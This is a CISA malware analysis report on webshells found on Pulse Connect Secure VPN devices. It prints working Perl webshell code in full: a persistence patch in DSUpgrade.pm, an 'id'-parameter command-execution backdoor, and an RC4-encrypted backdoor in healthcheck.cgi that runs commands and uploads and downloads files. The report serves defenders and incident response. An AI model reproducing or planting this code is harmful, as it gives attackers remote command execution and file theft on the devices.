Malware Analysis Report (AR21-202B)

MAR-10333243-1.v1: Pulse Connect Secure

Click to Tweet.
Click to send to Facebook.
Click to Share.

Summary

Malware Analysis Report
10333243.r1.v1
2021-07-14

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

Four (4) files were submitted to CISA for analysis related to Pulse Secure Perl Common Gateway Interface (CGI) exploit. The files contain webshells or are designed to propagate shells that allow for remote code execution or unauthorized access. This analysis is derived from malicious files found on Pulse Connect Secure devices.

For a downloadable copy of IOCs, see: MAR-10333243-1.v1WHITE.stix.

Submitted Files (4)

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85 (DSUpgrade.pm)

bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98 ( licenseserverproto.cgi )

d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a (licenseserverproto.cgi)

ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496 (healthcheck.cgi)

Findings

a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85

Tags

trojanwebshell

Details
Name DSUpgrade.pm
Size 5270 bytes
Type Perl5 module source, ASCII text, with very long lines
MD5 d855ebd2adeaf2b3c87b28e77e9ce4d4
SHA1 1e43bc7cde1c2ac7b0db7b74b3be47334171d410
SHA256 a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85
SHA512 d94795f11c04862b054d2f83babca034c20bfd00c2c0abe1e1fcfdb3854924a0d9944d0f168147060311d948b1bb194f27eaa491563e7b00ba58e776a4a6f676
ssdeep 96:FYIFAu1JZtGm4OcAHgDfX27AF1K2dsvWlgzP5Ft8gb16rJ2yXp6uIvWZlGMQbvek:eIB1XcTfX20Dds+gF3Ar8yXp6uIyUMQB
Entropy 5.031760
Antivirus
ClamAV Unix.Trojan.ATRIUM-9855919-0
YARA Rules

No matches found.

ssdeep Matches
99 359b86d7f20430f0418b8401be34251bcddcc8aa48803597d8d78caaa547c875
91 463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9
99 c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69
Relationships
a3b60b4bc4... Related_To d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a
Description

The file contains malicious code that was patched into the Pulse Secure application.

--Begin Malicious Code--
my $cgi_p="/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi";
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");
system("cp -f /tmp/installer/do-install /pkg/");
system("cp -f /tmp/installer/VERSION /pkg/");
system("cp -f /tmp/installer/sysboot-shlib /pkg/");
system("cp -f /tmp/installer/losetup /pkg/");
system("$cmd_x");
system("rm -rf /tmp/installer");
my $td = time - $ts;
my $status = $? % 255;
if ($status == 0) {
   print $html " complete ($td seconds)</li>";
   print $console " complete\r\n";
}
else {
   print $html " failed</li>";
   print $console " failed\r\n";
}


return $status == 0;
}
--End Malicious Code--

The patched in code will leverage the following SED command to patch a malicious webshell into the Pulse Secure system file “/pkg/do-install”:

--Begin Malicious SED Command--
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install"
--End Malicious SED Command--

The purpose of the webshell is to accept a parameter named "id" from within an incoming web application post, and also copy another instance of the shell into the parameter '$cgi_p', which resolves to the legitimate file 'licenseserverproto.cgi'. The webshell will then process the data provided within the "id" parameter as an operating system command by executing it locally utilizing the system() function.

d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a

Tags

webshell

Details
Name licenseserverproto.cgi
Size 2105 bytes
Type Perl script text executable
MD5 e50edf64239b84be02ee5902c22ab336
SHA1 1f26ef302ebc881380aa227ddd8eaebdad54679f
SHA256 d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a
SHA512 9acee1c2ca0ca24b76c2caab545abaea65e390b6b1f9e058e405bb438ce95eb20a0c1a10512f0b594ebab6dd5f8c0d5228eb3bcf0f8ba1a0f0a35fb0d3410eef
ssdeep 48:ECLYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejBv:E4YkJAZfv/wO27Y0
Entropy 5.119005
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches
97 44a8b2187c8d181a73285379b4566ed9d39d4ed208d633dcd0dda67a0a64e2a4
97 8fcec6ba8d033408926a7d1e3995fd63450e7bcdec7c637e644063a1432a5971
99 bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98
97 dc985611d4017c11bdbc8d894453ad7e844c122d4c870255a6a86a247a8f98f6
97 ea1574595f87171c26f483df77dec52b0c5c73dd37f4dd554944cd6a8b484d17
Relationships
d3982747d9... Related_To a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85
Description

This artifact is a Pulse Secure CGI application that has been modified with the following malicious webshell:

---Begin Malicious Webshell---
if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}
---End Malicious Webshell---

The webshell is designed to perform an initial check to determine whether data was passed into the web application within a parameter named "id". If this parameter is provided, the code will extract its contents and execute it on the target system using the system() function. If no "id" parameter is passed to the application the code will simply execute the main() function of the original Pulse Secure application.

ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496

Tags

webshell

Details
Name healthcheck.cgi
Size 9272 bytes
Type Perl script text executable
MD5 f23e94a38f0a93df46ba83786f3180e0
SHA1 2f1eddf6af9284f6b6c0a8b14fc3e5986ee601c7
SHA256 ec3dc5a11b66c5b3ab006ac786914de674e50d0b08c6f6d0cfe7247dbe67a496
SHA512 ec6b5f25ccdf9a251ff8ba10086820c4cf841e1d487f242edf1f6d7b1b2437f6b2fd12b80989c80a008fb5e7469713971afb39703df7ee556df24669a3124e0d
ssdeep 192:5zwJNuIYj7rcCOk1QrhMeWyOUV9AWojcZiOQiQsfinnoK9Cih1pa+7yi3hm:5zwJwrXWOUV9AWojoiOujQ
Entropy 5.114695
Antivirus
Symantec Hacktool.Webshell
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This artifact is a Pulse Secure CGI script that has been maliciously modified. The modification allows for remote command execution and uploads and downloads of encrypted files. The malicious code is displayed below. Analyst comments are in brackets []:

---Begin Malicious Code---
use MIME::Base64;
use Crypt::RC4;

my $ph="[REDACTED]"; [Hard coded RC4 key.]

sub r [Generates random bytes to be used in (sub a) for encryption.]
{
my $n=$_[0];
my $rs;
   for (my $i=0;$i<$n;$i++)
   {
   my $n1=int(rand(256));
   $rs.=chr($n1);
   }
return $rs;
}

sub a [RC4 encrypts a string that includes a random 6 byte key, RC4 key ($ph above), and the payload, then base64 encodes the string.]
{
my $st=$_[0];
my $k=r(6);
my $en = RC4( $k.$ph, $st);
return encode_base64($k.$en);
}

sub b [Base64 decodes a payload and then decodes using the above RC4 key ($ph) and 6 byte key.]
{
my $s= decode_base64($_[0]);
my $l=length($s);
my $k= substr($s,0,6);
my $en=substr($s,6,$l-6);
my $de = RC4( $k.$ph, $en );
return $de;
}

sub c [Downloads a file and uses the (sub b) function above to decrypt it, or uploads a file and uses the (sub a) function above to encrypt it.]

{
my $fi=CGI::param('img');
my $FN=b($fi);
my $fd;
print "Content-type: application/x-download\n";
open(*FILE, "<$FN" );
   while(<FILE>)
   {
    $fd=$fd.$_;
   }
close(*FILE);
print "Content-Disposition: attachment;
filename=tmp\n\n";
print a($fd);
}

sub d [Decrypts a file using the (sub b) function above and writes out the file.]
{
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $fi = CGI::param('cert');
$fi=b($fi);
my $pa=CGI::param('md5');
$pa=b($pa);
open (*outfile, ">$pa");
print outfile $fi;
close (*outfile);
}

sub e [Decrypts an incoming command and executes as system. If the command has the wrong parameter it returns "Error 404".]
{
print "Cache-Control: no-cache\n";
print "Content-type: image/gif\n\n";
my $na=CGI::param('name');
$na=b($na);my $rt;
   if (!$na or $na eq "cd")
   {
    $rt="Error 404";
   }
    else
   {
   my $ot="/tmp/1";
   system("$na >/tmp/1 2>&1");
   open(*cmd_result,"<$ot");
    while(<cmd_result>)
    {
       $rt=$rt.$_;
    }
   close(*cmd_result);
   unlink $ot} print a($rt);
}

sub f [Responses to POST requests.]
{
if(CGI::param('cert')) [If it receives a file it attempts to write it.]
{
   d();
}
elsif(CGI::param('img') and CGI::param('name')) [If it receives a command it attempts to execute it.]
{
   c();
}
elsif(CGI::param('name') and CGI::param('img') eq "") [If it is unable to execute the command it sends "Error 404".]
{
   e();
}
else # [Do normal processing.]
{
    &main();
}
}
if ($ENV{'REQUEST_METHOD'} eq "POST") [If its a POST request follow (sub f) function above.]
{
f();
}
else
{
&main(); [Do normal processing.]
}
---End Malicious Code---


The last part of this file contains modified code that renders a dialog box that allows for the searching of files to be downloaded. Before downloading, the files are RC4 encrypted and base64 encoded. The program uses the hard-coded key for the RC4 encryption.

bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98

Tags

webshell

Details
Name licenseserverproto.cgi
Size 2104 bytes
Type Perl script text executable
MD5 a0ce730cffc65e6950c6a5d1d2de0ebb
SHA1 620bfbc94296271c3c6d71b97a8b5486d63347b3
SHA256 bef423bd85a25d14ffa511a0e04194e59b283057bd41689d473f79d227942c98
SHA512 c2102a112e7fd41cda15fbab438b6b849e072beaaf0650d209fb9b4350e260cb3a611eac3acf9f2aa6c8ce9be071aed1362db7619f14d94990d00cada4256b77
ssdeep 48:E1LYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejBv:EJYkJAZfv/wO27Y0
Entropy 5.120040
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This artifact is a Pulse Secure CGI application that has been modified with the following malicious webshell:

---Begin Malicious Webshell---
if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}
---End Malicious Webshell---

The webshell is designed to perform an initial check to determine whether data was passed into the web application within a parameter named "id". If this parameter is provided, the code will extract its contents and execute it on the target system using the system() function. If no "id" parameter is passed to the application, the code will simply execute the main() function of the original Pulse Secure application.

Relationship Summary

a3b60b4bc4... Related_To d3982747d9b589ea20581b0448bddfd7c8a7cdad4760a99b4de762742833640a
d3982747d9... Related_To a3b60b4bc4a5c7af525491ba37b570f90405aa83e36655da7d91bd68acaedf85

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

July 21, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Please share your thoughts.

We recently updated our anonymous product survey; we'd welcome your feedback.